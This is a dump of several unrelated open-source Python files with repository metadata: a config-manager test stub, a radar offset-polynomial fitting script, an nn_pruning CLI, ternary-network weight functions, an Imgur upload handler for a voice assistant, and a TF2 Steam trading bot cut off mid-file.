max_stars_repo_path (string, 4-245) | max_stars_repo_name (string, 7-115) | max_stars_count (int64, 101-368k) | id (string, 2-8) | content (string, 6-1.03M) |
---|---|---|---|---|
tests/config/test_manager.py | NishanBanga/JobFunnel | 1,652 | 84327 |
# FIXME: need to break down config manager testing a bit more
# @pytest.mark.parametrize('pass_del_cfg', (True, False))
# def test_config_manager_init(mocker, pass_del_cfg):
# """NOTE: unlike other configs this one validates itself on creation
# """
# # Mocks
# patch_del_cfg = mocker.patch('jobfunnel.config.manager.DelayConfig')
# patch_os = mocker.patch('jobfunnel.config.manager.os')
# patch_os.path.exists.return_value = False # check it makes all paths
# mock_master_csv = mocker.Mock()
# mock_block_list = mocker.Mock()
# mock_dupe_list = mocker.Mock()
# mock_cache_folder = mocker.Mock()
# mock_search_cfg = mocker.Mock()
# mock_proxy_cfg = mocker.Mock()
# mock_del_cfg = mocker.Mock()
# # FUT
# cfg = JobFunnelConfigManager(
# master_csv_file=mock_master_csv,
# user_block_list_file=mock_block_list,
# duplicates_list_file=mock_dupe_list,
# cache_folder=mock_cache_folder,
# search_config=mock_search_cfg,
# delay_config=mock_del_cfg if pass_del_cfg else None,
# proxy_config=mock_proxy_cfg,
# log_file='', # TODO optional?
# )
# # Assertions
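# # (Editorial sketch, not from the original: one way the assertions might look
# # if this test were re-enabled. The attribute and mock-call names below are
# # assumptions about JobFunnelConfigManager, not verified against the project.)
# # assert cfg.master_csv_file == mock_master_csv
# # assert cfg.search_config == mock_search_cfg
# # if not pass_del_cfg:
# #     assert cfg.delay_config == patch_del_cfg.return_value
# # patch_os.makedirs.assert_called()  # paths created since os.path.exists -> False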
|
components/stdproc/stdproc/offsetpoly/test/offpoly.py | vincentschut/isce2 | 1,133 | 84352 |
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Copyright 2014 California Institute of Technology. ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# United States Government Sponsorship acknowledged. This software is subject to
# U.S. export control laws and regulations and has been classified as 'EAR99 NLR'
# (No [Export] License Required except when exporting to an embargoed country,
# end user, or in support of a prohibited end use). By downloading this software,
# the user agrees to comply with all applicable U.S. export laws and regulations.
# The user has the responsibility to obtain export licenses, or other export
# authority as may be required before exporting this software to any 'EAR99'
# embargoed foreign country or citizen of those countries.
#
# Author: <NAME>
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
import isce
import stdproc
import isceobj
import logging
import numpy as np
from Poly2d import Polynomial
from stdproc.stdproc.offsetpoly.Offsetpoly import Offsetpoly
logger = logging.getLogger('dense')
def load_pickle(step='outliers1'):
try:
import cPickle
except ImportError:
import pickle as cPickle
insarObj = cPickle.load(open('PICKLE/{0}'.format(step), 'rb'))
return insarObj
def runOffPolyISCE(offField):
'''
Estimate polynomial here.
'''
inArr = np.array(offField.unpackOffsets())
x = inArr[:,0]
y = inArr[:,2]
dx = inArr[:,1]
dy = inArr[:,3]
sig = inArr[:,4]
obj = Offsetpoly()
obj.setLocationAcross(list(x))
obj.setLocationDown(list(y))
obj.setSNR(list(sig))
obj.setOffset(list(dy))
obj.offsetpoly()
val = obj.offsetPoly
# print('Range: ', val)
azpol = Polynomial(rangeOrder=2, azimuthOrder=2)
azpol.setCoeffs([[val[0],val[1],val[4]],
[val[2], val[3]],
[val[5]]])
obj.setOffset(list(dx))
obj.offsetpoly()
val = obj.offsetPoly
# print('Azimuth: ', val)
rgpol = Polynomial(rangeOrder=2, azimuthOrder=2)
rgpol.setCoeffs([[val[0],val[1],val[4]],
[val[2], val[3]],
[val[5]]])
return azpol, rgpol
def runOffPoly(offField):
'''
Estimate polynomial here.
'''
inArr = np.array(offField.unpackOffsets())
x = inArr[:,0]
y = inArr[:,2]
dx = inArr[:,1]
dy = inArr[:,3]
sig = inArr[:,4]
snr = 1.0 + 1.0/sig
xOrder = 2
yOrder = 2
#####Normalization factors
ymin = np.min(y)
ynorm = np.max(y) - ymin
if ynorm == 0:
ynorm = 1.0
yoff = int(np.round(np.mean(dy)))
y = (y - ymin)/ynorm
xmin = np.min(x)
xnorm = np.max(x) - xmin
if xnorm == 0:
xnorm = 1.0
x = (x-xmin)/xnorm
arrList = []
for ii in range(yOrder + 1):
yfact = np.power(y, ii)
for jj in range(yOrder + 1-ii):
temp = np.power(x,jj)* yfact
arrList.append(temp.reshape((temp.size,1)))
A = np.hstack(arrList)
A = A / snr[:,None]
b = dy / snr
val, res, rank, eigs = np.linalg.lstsq(A,b, rcond=1.0e-12)
print('Az Chi : ', np.sqrt(res/(1.0*len(b))))
azpol = Polynomial(rangeOrder=2, azimuthOrder=2)
azpol.setCoeffs([val[0:3],val[3:5],val[5:]])
azpol._meanRange = xmin
azpol._normRange = xnorm
azpol._meanAzimuth = ymin
azpol._normAzimuth = ynorm
b = dx/snr
val,res, rank, eigs = np.linalg.lstsq(A,b, rcond=1.0e-12)
print('Rg chi : ', np.sqrt(res/(1.0*len(b))))
rgpol = Polynomial(rangeOrder=2, azimuthOrder=2)
rgpol.setCoeffs([val[0:3],val[3:5],val[5:]])
rgpol._meanRange = xmin
rgpol._normRange = xnorm
rgpol._meanAzimuth = ymin
rgpol._normAzimuth = ynorm
return azpol, rgpol
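# ---------------------------------------------------------------------------
# Editorial sketch (not part of the original module): a minimal, standalone
# numpy illustration of the weighted 2-D quadratic least-squares fit that
# runOffPoly() performs above. The synthetic data and the helper name
# _demo_weighted_polyfit are made up for illustration only.
# ---------------------------------------------------------------------------
def _demo_weighted_polyfit():
    rng = np.random.default_rng(0)
    x = rng.uniform(0.0, 1.0, 200)              # normalized range coordinate
    y = rng.uniform(0.0, 1.0, 200)              # normalized azimuth coordinate
    b = 1.5 + 0.2 * x - 0.1 * y + 0.05 * x * y  # synthetic offsets to fit
    snr = np.ones_like(b)                       # uniform weights for simplicity
    cols = []
    for ii in range(3):                         # azimuth powers 0..2
        for jj in range(3 - ii):                # range powers, triangular truncation
            cols.append((np.power(x, jj) * np.power(y, ii)).reshape(-1, 1))
    A = np.hstack(cols) / snr[:, None]
    val, res, rank, eigs = np.linalg.lstsq(A, b / snr, rcond=None)
    # val[0:3], val[3:5], val[5:] correspond to the coefficient grouping used above
    return val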
if __name__ == '__main__':
iObj = load_pickle()
print('Done loading pickle')
width = iObj.getReferenceSlcImage().getWidth()
length = iObj.getReferenceSlcImage().getLength()
print('Image Dimensions: ', length, width)
print('Results from numpy code')
azpol, rgpol = runOffPoly(iObj.getRefinedOffsetField())
print('Upper Left: ', rgpol(1,0), azpol(1,0))
print('Upper Right: ', rgpol(1,width-1), azpol(1,width-1))
print('Lower Left: ', rgpol(length+1,0), azpol(length+1,0))
print('Lower Right: ', rgpol(length+1,width-1), azpol(length+1,width-1))
print('Results from old method')
az1, rg1 = runOffPolyISCE(iObj.getRefinedOffsetField())
print('Upper Left: ', rg1(1,0), az1(1,0))
print('Upper Right: ', rg1(1,width-1), az1(1,width-1))
print('Lower Left: ', rg1(length+1,0), az1(length+1,0))
print('Lower Right: ', rg1(length+1,width-1), az1(length+1,width-1))
|
analysis/command_line.py | ebell495/nn_pruning | 250 | 84362 |
#!/usr/bin/env python
import click
import json
import sh
from pathlib import Path
from datetime import datetime
from analyze_run import ModelAnalysis
from create_model import Packager
from plot import main_plot
import os
import sys
from aws_download import AWSExperienceDownloader
@click.group()
@click.pass_context
def cli(ctx):
ctx.obj = {}
@cli.command()
@click.argument("bucket", type=str)
@click.argument("output", default=None, type=click.Path(resolve_path=True, exists=True))
@click.option("-p", "--pattern", type=str, multiple=True)
def download(bucket, output, pattern):
"""Download SageMaker results and unpack them"""
downloader = AWSExperienceDownloader(bucket,
Path("__file__").parent / "tmp",
output)
for p in pattern:
downloader.load(pattern=p)
@cli.command()
@click.argument("input", default=None, type=click.Path(resolve_path=True, exists=True))
@click.argument("output", default="s3://lagunas-sparsity-experiments/backup/nn_pruning/output", type=str)
@click.option("--clean-train-files", is_flag=True, help="remove optimizer.pt files")
@click.option("--dryrun", is_flag=True, help="")
def upload(input, output, clean_train_files, dryrun):
"""Upload all model checkpoints to s3 for archival. You may want to remove large files like optimizer.pt before that."""
if clean_train_files:
to_remove = ["optimizer.pt"]
for root, subFolders, files in os.walk(input):
for file in files:
if file in to_remove:
path = Path(root) / file
print(f"Removing train file {path}")
if not dryrun:
path.unlink()
if dryrun:
dry_run_command = ["--dryrun"]
else:
dry_run_command = []
command = ["s3", "sync"] + dry_run_command + ["--follow-symlinks", input, output]
sh.aws(*command, _out = sys.stdout)
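# Hedged usage sketch (editorial addition). The bucket names and paths below are
# placeholders, not values taken from this project:
#   python command_line.py download my-sagemaker-bucket ./downloads -p "squadv1*"
#   python command_line.py upload ./output s3://my-backup-bucket/nn_pruning/output --dryrun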
TASKS = ["squadv1", "squadv2", "cnn_dailymail", "mnli", "qqp", "sst2"]
@cli.command()
@click.argument("input", default=None, type=click.Path(resolve_path=True, exists=True))
@click.option("--output", default="files/results", type=str, help="Base name of the output json files.")
@click.option("--task", default=TASKS, type=str, multiple=True)
@click.option("--dataset-config", default=None, type=str, help="The configuration name of the dataset to use.")
@click.option("--force-speed", is_flag=True, help="Force reevaluation of model speed.")
@click.option("--skip-check", is_flag=True, help="Keep legacy models (that did not pruned bias) and more generally models that have different eval results after pruning, so use wisely.")
def analyze(input, output, task, dataset_config, force_speed, skip_check):
"""Analyze all the directories 'd' in INPUT, and each run in d (each run contains N checkpoints), then write a json file for each task, named OUTPUT_{task}.json.
Each directory 'd' name should starts with '{task}_' indicating which task it contains.
(squad for squadv1, squadv2 or squad_v2 for squadv2, mnli, ccnews for cnn_dailymail. See ModelAnalysis class for for more information).
"""
for t in task:
ma = ModelAnalysis(input,
output,
t,
dataset_config_name=dataset_config,
force_speed=force_speed,
prefixes = ["fine_tuned_", "hp_", "aws_", "large_"],
exclude_non_matching_f1=not skip_check)
ma.run()
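# Hedged usage sketch (editorial addition); the directory layout shown is an
# illustration of the naming convention described in the docstring above:
#   python command_line.py analyze ./checkpoints --task squadv1 --output files/results
# where ./checkpoints contains directories such as squadv1_hp_search/, each holding
# runs with their checkpoints; results land in files/results_squadv1.json.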
@cli.command()
@click.option("--results", default="files/results", type=str, help="Base name of the results json files.")
@click.option("--task", default=TASKS, type=str, multiple=True)
def plot(results, task):
main_plot(results, task)
MODEL_KINDS = ["hybrid", "hybrid-filled", "unstruct"]
@cli.command()
@click.argument("checkpoint", default=None, type=click.Path(exists=True))
@click.argument("kind", default=None, type = click.Choice(MODEL_KINDS))
@click.argument("task", default=None, type= click.Choice(TASKS))
@click.argument("user", default=None, type = str)
@click.argument("dest", default=None, type= click.Path(resolve_path=False, exists=True))
@click.option("--results", default="files/results", type=str, help="Base name of the output json files.")
@click.option("--only-name", is_flag=True, help="Only print what would be the name of the git.")
def model_upload(checkpoint, kind, task, user, dest, results, only_name):
# Upload a model to the hub. This includes compiling the model, extracting statistics, preparing a model card etc.
p = Packager(user, f"{results}_{task}.json", checkpoint, dest, kind = kind, task = task)
p.run(only_name=only_name)
@cli.command()
@click.argument("user", default=None, type = str)
@click.argument("password", default=<PASSWORD>, type = str)
@click.argument("model_name", default=None, type = str)
def delete_hub_model(user, password, model_name):
import transformers.hf_api as hf_api
api = hf_api.HfApi()
token = api.login(user, password)
for m in api.model_list():
if "madlag" in m.modelId and "ampere" in m.modelId:
print(m.modelId)
api.delete_repo(token=token, name=model_name)
@cli.command()
@click.argument("user", default=None, type = str)
@click.argument("password", default=None, type = str)
def list_models(user, password):
import transformers.hf_api as hf_api
api = hf_api.HfApi()
token = api.login(user, password)
for m in api.model_list():
if user in m.modelId:
print(m.modelId)
@cli.command()
@click.pass_context
@click.argument("basedir", type=click.Path(resolve_path=True), nargs = 1)
@click.argument('result_files', type=click.Path(resolve_path=True), nargs=-1) #help="Result files used as whitelist (files/results_*.json for example) "
@click.option('--execute', is_flag=True)
def clean(ctxt, basedir, result_files, execute):
"""Clean the checkpoints to save disk space and only keep the best ones referenced in json results files (like files/results*_.json).
You may want to run the 'upload' command before doing this to backup all the checkpoints.
This only removes the "pytorch_model.bin" files
"""
if execute:
click.echo("EXECUTING")
else:
click.echo("DRY RUN")
click.echo("Base dir")
click.echo(" " + basedir)
click.echo()
click.echo("Result files:")
for r in result_files:
click.echo(" " + r)
click.echo()
if len(result_files) == 0:
click.echo("Empty result files")
raise click.Abort()
whitelist = {}
for filename in result_files:
with open(filename) as f:
single_whitelist = json.load(f)["checkpoints"]
for k in single_whitelist:
whitelist[k] = True
click.echo("Whitelisted checkpoints:")
whitelisted = len(whitelist)
click.echo(f" {whitelisted}")
click.echo()
kept = {}
removed = {}
removed_size = 0
def find_whitelisted_checkpoint(whitelist, dir):
dir = str(dir.resolve())
for k in whitelist:
if k.startswith(dir):
return True
return False
for dir in Path(basedir).iterdir():
if not find_whitelisted_checkpoint(whitelist, dir):
click.echo(click.style(f"excluded {dir} (no whitelisted checkpoint in this base directory)", fg='red'))
continue
click.echo(click.style(f"scanning {dir} ", fg='green'))
set_dir = dir.resolve()
for hp_name in set_dir.iterdir():
for checkpoint in hp_name.iterdir():
checkpoint_str = str(checkpoint)
if checkpoint_str in whitelist:
kept[checkpoint_str] = True
else:
model_file = checkpoint / "pytorch_model.bin"
if model_file.exists():
removed[model_file] = True
removed_size += model_file.stat().st_size
click.echo("Kept / Whitelisted")
click.echo(f" {len(kept)} / {whitelisted}")
click.echo()
click.echo("Removed")
click.echo(f" {len(removed)} pytorch_model.bin files")
click.echo(" %0.2fGB" % (removed_size / (1024**3)))
if execute:
d = datetime.now().replace(microsecond=0)
d = d.isoformat().replace(":", "_").replace("T", "_")
removed_filename = "files/removed_files_%s.json" % d
click.echo()
with Path(removed_filename).open("w") as f:
for model_file in removed:
f.write(str(model_file) + "\n")
for model_file in removed:
# click.echo("REMOVING", model_file)
model_file.unlink()
click.echo("Wrote removed files list to:")
click.echo(f" {removed_filename}")
def main():
return cli()
if __name__ == "__main__":
main()
|
examples/Ternary-Net/ternary.py | skoppula/ternarynet | 109 | 84374 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import tensorflow as tf
G = tf.get_default_graph()
def p_ternarize(x, p):
x = tf.tanh(x)
shape = x.get_shape()
thre = tf.get_variable('T', trainable=False, collections=[tf.GraphKeys.VARIABLES, 'thresholds'],
initializer=0.05)
flat_x = tf.reshape(x, [-1])
k = int(flat_x.get_shape().dims[0].value * (1 - p))
topK, _ = tf.nn.top_k(tf.abs(flat_x), k)
update_thre = thre.assign(topK[-1])
tf.add_to_collection('update_thre_op', update_thre)
mask = tf.zeros(shape)
mask = tf.select((x > thre) | (x < -thre), tf.ones(shape), mask)
with G.gradient_override_map({"Sign": "Identity", "Mul": "Add"}):
w = tf.sign(x) * tf.stop_gradient(mask)
tf.histogram_summary(w.name, w)
return w
def tw_ternarize(x, thre):
shape = x.get_shape()
thre_x = tf.stop_gradient(tf.reduce_max(tf.abs(x)) * thre)
w_p = tf.get_variable('Wp', collections=[tf.GraphKeys.VARIABLES, 'positives'], initializer=1.0)
w_n = tf.get_variable('Wn', collections=[tf.GraphKeys.VARIABLES, 'negatives'], initializer=1.0)
tf.scalar_summary(w_p.name, w_p)
tf.scalar_summary(w_n.name, w_n)
mask = tf.ones(shape)
mask_p = tf.select(x > thre_x, tf.ones(shape) * w_p, mask)
mask_np = tf.select(x < -thre_x, tf.ones(shape) * w_n, mask_p)
mask_z = tf.select((x < thre_x) & (x > - thre_x), tf.zeros(shape), mask)
with G.gradient_override_map({"Sign": "Identity", "Mul": "Add"}):
w = tf.sign(x) * tf.stop_gradient(mask_z)
w = w * mask_np
tf.histogram_summary(w.name, w)
return w
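# ---------------------------------------------------------------------------
# Editorial sketch (not part of the original file): a plain-numpy illustration
# of the ternarization performed by tw_ternarize above -- values are mapped to
# {-w_n, 0, +w_p} around a threshold that is a fraction of max|x|. Here the
# scale factors are fixed constants instead of learned variables.
# ---------------------------------------------------------------------------
def _ternarize_numpy(x, thre_frac=0.05, w_p=1.0, w_n=1.0):
    import numpy as np
    x = np.asarray(x, dtype=np.float64)
    thre = thre_frac * np.max(np.abs(x))
    out = np.zeros_like(x)
    out[x > thre] = w_p
    out[x < -thre] = -w_n
    return out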
|
melissa/actions/imgur_handler.py | blacksparrow6/Melissa-Core | 554 | 84378 |
import os
import sqlite3
from datetime import datetime
from imgurpython import ImgurClient
# Melissa
from melissa import profile
from melissa.tts import tts
WORDS = {'image_uploader': {'groups': ['upload']},
'show_all_uploads': {'groups': [['all', 'uploads'],
['all', 'images'], ['uploads']]}}
def img_list_gen():
image_list = []
valid_image_extensions = [".tiff", ".png", ".gif", ".jpg"]
for root, _, files in os.walk(profile.data['images_path']):
for filename in files:
if os.path.splitext(filename)[1] in valid_image_extensions:
image_list.append(os.path.join(root, filename.lower()))
return image_list
def image_uploader(speech_text):
if profile.data['imgur']['client_id'] == "xxxx" \
or profile.data['imgur']['client_secret'] == "xxxx":
msg = 'upload requires a client id and secret'
print(msg)
tts(msg)
return
words_of_message = speech_text.split()
words_of_message.remove('upload')
cleaned_message = ' '.join(words_of_message)
if len(cleaned_message) == 0:
tts('upload requires a picture name')
return
image_listing = img_list_gen()
client = ImgurClient(profile.data['imgur']['client_id'],
profile.data['imgur']['client_secret'])
for i in range(0, len(image_listing)):
if cleaned_message in image_listing[i]:
result = client.upload_from_path(image_listing[i], config=None,
anon=True)
conn = sqlite3.connect(profile.data['memory_db'])
conn.execute("INSERT INTO image_uploads "
"(filename, url, upload_date) VALUES (?, ?, ?)",
(image_listing[i], result['link'],
datetime.strftime(datetime.now(), '%d-%m-%Y')))
conn.commit()
conn.close()
print(result['link'])
tts('Your image has been uploaded')
def show_all_uploads(text):
conn = sqlite3.connect(profile.data['memory_db'])
cursor = conn.execute("SELECT * FROM image_uploads")
for row in cursor:
print(row[0] + ': (' + row[1] + ') on ' + row[2])
tts('Requested data has been printed on your terminal')
conn.close()
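# Editorial note (assumption, not taken from this file): the INSERT/SELECT
# statements above presuppose an existing SQLite table roughly like
#   CREATE TABLE image_uploads (filename TEXT, url TEXT, upload_date TEXT);
# created elsewhere during Melissa's memory database setup.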
|
bot.py | Zwork101/tf2_trade_bot | 150 | 84396 |
import os
import sys
import json
import time
from distutils.version import LooseVersion
import importlib
import pip
from enum import Enum
import logging
import csv
import subprocess
try:
main = pip.main
except AttributeError:
# module 'pip' has no attribute 'main'
from pip._internal import main
apikey = ''
password = ''
username = ''
bkey = ''
buy_trades = {}
sell_trades = {}
items = {}
key_price = 0
bud_price = 0
escrow = None
whitelist = []
currencies = {'bud':'Earbuds', 'ref':'Refined Metal', 'rec':'Reclaimed Metal', 'scrap':'Scrap Metal', 'key':'Mann Co. Supply Crate Key'}
packages = ['steampy', 'requests']
declined_trades = None
past_time = time.time()
start_time = time.time()
logging.basicConfig(filename='trade.log', level=logging.DEBUG,
format='[%(asctime)s][%(levelname)s][%(name)s]: %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
start_text = """
_____ _____ ____ _____ ____ _ ____ U _____ u ____ U ___ u _____
|_ " _| |" ___||___"\ |_ " _|U | _"\ u U /"\ u | _"\ \| ___"|/ U | __")u \/"_ \/|_ " _|
| | U| |_ uU __) | | | \| |_) |/ \/ _ \/ /| | | | | _|" \| _ \/ | | | | | |
/| |\ \| _|/ \/ __/ \ /| |\ | _ < / ___ \ U| |_| |\| |___ | |_) |.-,_| |_| | /| |\
u |_|U |_| |_____|u u |_|U |_| \_\ /_/ \_\ |____/ u|_____| |____/ \_)-\___/ u |_|U
_// \\\_ )(\\\,- << // _// \\\_ // \\\_ \\\ >> |||_ << >> _|| \\\_ \\\ _// \\\_
(__) (__)(__)(_/(__)(__) (__) (__)(__) (__)(__) (__)(__)_) (__) (__) (__) (__) (__) (__) (__)
Created by: Zwork101 Github: https://github.com/Zwork101 Steam: https://steamcommunity.com/id/ZWORK101
THIS VERSION IS NO LONGER UNDER DEVELOPMENT AND BUGS WILL NOT BE FIXED. IT IS HIGHLY RECOMMENDED TO SWITCH
TO THE NEW VERSION. YOU CAN FIND THIS AT: https://github.com/mninc/tf2-trade-bot-2\n
"""
class TradeOfferStatus(Enum):
INVALID = 1
ACTIVE = 2
ACCEPTED = 3
EXPIRED = 4
CANCELED = 6
INVALID_ITEMS = 8
WAIT_CONF = 9
WAIT_SFAC = 10
ESCROW = 11
class TradeManager:
"""
The manager for trades. This will be used to organize trades and keep everything from falling apart.
Params: client (steampy.client.SteamClient object) and conf (steampy.confirmation.ConfirmationExecutor)
Public values: client and conf (see above)
Public functions: accept, check_trades_content, get_new_trades, check_good_trades, check_bad_trades
"""
def __init__(self, client, conf):
self._trades = []
self._pending_trades = []
self._try_confs = []
self._declined_trades = []
self.client = client
self.conf = conf
def decline(self, trade):
if decline_trades:
self.client.decline_trade_offer(trade.id)
if trade.id not in self._declined_trades:
self._declined_trades.append(trade.id)
def accept(self, trade):
"""
The accept function handles accepting trades. This is important, because different errors could occur.
Params: (self), trade (Trade object)
Output: bool (True if the offer was accepted, False if an error occurred)
"""
try:
self.client.accept_trade_offer(trade.id)
return True
except BaseException as BE:
if BE.__class__ == KeyError:
print(f'ERROR: Issue confirming trade: {trade.id}, trying again')
#self._trades.remove(trade)
self._pending_trades.append(trade)
logging.warning(f'TRADE ACCEPT ERROR: {type(BE).__name__}: {BE}')
return False
def check_trades_content(self):
"""
This will check the current trades in self._pending_trades and decide whether they are correct.
Then it moves them to self._trades or self._declined_trades after accepting/declining the
trade offers.
Params: (self)
Output: None
"""
for trade in range(len(self._pending_trades)-1,-1,-1):
trade = self._pending_trades[trade]
sell_value = 0
buy_value = 0
extra_sell = []
extra_buy = []
if not trade.items_to_give:
self._pending_trades.remove(trade)
self._trades.append(trade)
self.accept(trade)
continue
exit_trade = False
for item in trade.items_to_give:
if not exit_trade:
if item not in sell_trades:
if item in currencies.values():
extra_sell.append(item)
else:
print('[TRADE]: Unknown item we\'re giving, declining')
self.decline(trade)
self._pending_trades.remove(trade)
logging.info("DECLINING TRADE WITH UN-KNOWN ITEM")
exit_trade = True
else:
sell_value = add_values(float(sell_trades[item]), float(sell_value))
if exit_trade:
continue
for item in trade.items_to_receive:
if item in buy_trades:
buy_value = add_values(float(buy_trades[item]), float(buy_value))
elif item in currencies.values():
extra_buy.append(item)
sell_curr = sort(extra_sell)
buy_curr = sort(extra_buy)
sell_value += calculate(sell_curr[0], sell_curr[1], sell_curr[2], sell_curr[3], sell_curr[4])
buy_value += calculate(buy_curr[0], buy_curr[1], buy_curr[2], buy_curr[3], buy_curr[4])
if sell_value <= buy_value:
print(f'[TRADE]: Looks good! They gave us:\n{str(trade.items_to_receive)}')
print(f'[TRADE]: We gave them:\n{str(trade.items_to_give)}')
print('[TRADE]: Attempting to accept offer')
try:
logging.info(f"ATTEMPTING TRADE: {trade.id}\nSELL: {sell_value} BUY:{buy_value}\n{trade.trade}")
self._trades.append(trade)
self._pending_trades.remove(trade)
self.accept(trade)
except ConfirmationExpected:
logging.warning(f'FAILED TO CONFIRM TRADE: {trade.id} (FIRST TRY)')
self._try_confs.append(trade.id)
else:
print(f'[TRADE]: No good! They offered us:\n{str(trade.items_to_receive)}')
print(f'[TRADE]: For our:\n{str(trade.items_to_give)}')
print('[TRADE]: Declining offer')
logging.info(f"DECLINING INVALID TRADE: {trade.id}\nSELL: {sell_value} BUY:{buy_value}\n{trade.trade}")
self.decline(trade)
self._pending_trades.remove(trade)
def get_new_trades(self):
"""
Collects new trades and compares them to current trades to ensure they are new. Accepts if the sender
is whitelisted, declines if the user is a scammer or the trade is escrow. Otherwise, moves the trade to
self._pending_trades (list).
Params: (self)
Output: None
"""
new_trades = client.get_trade_offers()['response']
#logging.debug(new_trades)
for new_trade in new_trades['trade_offers_received']:
if (not new_trade['tradeofferid'] in [t.id for t in self._trades]) \
or (new_trade['tradeofferid'] in self._declined_trades):
id64 = 76561197960265728 + new_trade['accountid_other']
trade = Trade(new_trade, id64)
logging.info(f"FOUND NEW TRADE: {trade.id}")
if str(id64) in whitelist:
print(f"[WHITELIST]: Neat! The user sending this trade is whitelisted! Attempting confirmation (STEAM ID:{id64})")
logging.info(f'TRADE WHITELISTED ATTEMPTING TRADE: {trade.id}')
self.accept(trade)
self._trades.append(trade)
continue
print(f'[TRADE]: Found trade (ID: {trade.id})')
if self._check_partner(trade):
if not accept_escrow and trade.escrow:
print("[TRADE]: Trade is escrow, declining")
logging.info(f'DECLINING ESCROW TRADE: {trade.trade}')
self.decline(trade)
else:
self._pending_trades.append(trade)
def _check_partner(self, trade):
"""
Checks whether the user is flagged as a scammer on backpack.tf and steamrep.com, using the backpack.tf API
(which also supplies the steamrep status for the user). If the user is a scammer, it
declines the trade and moves it to self._declined_trades.
Params: (self), trade (Trade object)
Output: bool (True if the partner is clean, False if the trade was declined)
"""
print("[TRADE]: Checking for trade bans on backpack.tf and steamrep.com")
rJson = requests.get(f"https://backpack.tf/api/users/info/v1?",
data={'key':bkey, 'steamids':trade.other_steamid}).json()
logging.debug(str(rJson))
if "bans" in rJson['users'][trade.other_steamid].keys():
if "steamrep_caution" in rJson['users'][trade.other_steamid]['bans'] or \
"steamrep_scammer" in rJson['users'][trade.other_steamid]['bans']:
print("[steamrep.com]: SCAMMER")
print('[TRADE]: Ending trade...')
logging.info(f"DECLINED SCAMMER (ID:{trade.other_steamid})")
self.decline(trade)
return False
print('[steamrep.com]: User is not banned')
if "all" in rJson['users'][trade.other_steamid]['bans']:
print('[backpack.tf]: SCAMMER')
print('[TRADE]: Ending trade...')
logging.info(f"DECLINED SCAMMER (ID:{trade.other_steamid})")
self.decline(trade)
return False
print('[backpack.tf]: User is clean')
print("[backpack.tf/steamrep.com]: User is clean")
return True
def check_bad_trades(self):
"""
Looks at the current trades in self._trades and checks if a trade has become invalid (e.g.
if the trade was canceled). It removes the trade from self._trades and reports what happened to the user.
Params: (self)
Output: None
"""
for trade_index in range(len(self._trades)-1, -1, -1):
trade = self._trades[trade_index]
status = trade.status()
if status == TradeOfferStatus.INVALID.value:
print(f'[ERROR]: Trade offer id {trade.id} seems to be invalid')
self._trades.remove(trade)
logging.warning(f'TRADE {trade.id} BECAME invalid')
elif status == TradeOfferStatus.CANCELED.value:
print(f'[TRADE]: Trade {trade.id} was canceled.')
self._trades.remove(trade)
logging.warning(f'TRADE {trade.id} BECAME canceled')
elif status == TradeOfferStatus.EXPIRED.value:
print(f'[TRADE]: Trade {trade.id} has expired... How did that happen?')
self._trades.remove(trade)
logging.warning(f'TRADE {trade.id} BECAME expired')
elif status == TradeOfferStatus.INVALID_ITEMS.value:
print(f'[TRADE]: Items attempting to trade became invalid. {trade.id}')
self._trades.remove(trade)
logging.warning(f'TRADE {trade.id} BECAME invalid_items')
elif status == TradeOfferStatus.ESCROW.value and not accept_escrow:
print('[ERROR]: Whoops, escrow trade was confirmed. Sorry about that')
self._trades.remove(trade)
logging.fatal(f'ACCEPTED ESCROW TRADE')
def check_good_trades(self):
"""
This method does 2 things. The first thing it does is check to see if trades have been accepted.
If they have, they will be removed from self._trades and will report that the trade was accepted.
The second thing is to try and confirm trades that are having issues confirming. If it was confirmed,
it will be removed from self._try_confs, and report to user it was confirmed.
Params: (self)
Output: None
"""
for trade_index in range(len(self._trades) - 1, -1, -1):
trade = self._trades[trade_index]
status = trade.status()
if status == TradeOfferStatus.ACCEPTED.value:
print(f'[TRADE]: Accepted trade {trade.id}')
self._trades.remove(trade)
logging.info(f'TRADE {trade.id} WAS ACCEPTED')
def confirm_check(self):
if confirm_settings == 'all':
logging.debug('ACCEPTING EVERYTHING')
for confirmation in self.conf._get_confirmations():
self.conf._send_confirmation(confirmation)
logging.info(f'SENT CONFIRMATION FOR CONF WITH ID OF {confirmation.id}')
elif confirm_settings == 'trade':
for tradeid in self._try_confs:
try:
self.conf.send_trade_allow_request(tradeid)
print(f'[TRADE]: Accepted trade {tradeid}')
logging.info(f'TRADE {tradeid} WAS ACCEPTED (after manual confirmation)')
self._try_confs.remove(tradeid)
except ConfirmationExpected:
logging.debug(f'CONFIRMATION FAILED ON {tradeid}')
class Trade:
"""
This is an object mainly to store data about a trade and make it easy to access. It can also
sort the currency in the trade and fetch the status of the trade.
Params: trade_json (dict), other_steamid (str)
Public values: self.trade (dict), self.escrow (int), self.items_to_give (list), self.items_to_receive (list),
self.id (int/str), self.other_steamid (str)
Public functions: sort, status
"""
def __init__(self, trade_json:dict, other_steamid:int):
self.trade = trade_json
self.escrow = int(trade_json['escrow_end_date'])
self.items_to_give = self._items_to_give()
self.items_to_receive = self._items_to_receive()
self.id = trade_json["tradeofferid"]
self.other_steamid = str(other_steamid)
def _items_to_receive(self):
"""
Adds all items to self.items_to_receive as their market name. Should only be used in initialization.
Params: (self)
Output: item_names (list)
"""
item_names = []
for assetID in self.trade['items_to_receive']:
item_names.append(self.trade['items_to_receive'][assetID]['market_name'])
return item_names
def _items_to_give(self):
"""
Adds all items to self.items_to_give as their market name. Should only be used in initialization.
Params: (self)
Output: item_names (list)
"""
item_names = []
for assetID in self.trade['items_to_give']:
item_names.append(self.trade['items_to_give'][assetID]['market_name'])
return item_names
def sort(self, typ):
"""
Counts how much of each currency type there is on one side of the trade. "sort" is sort
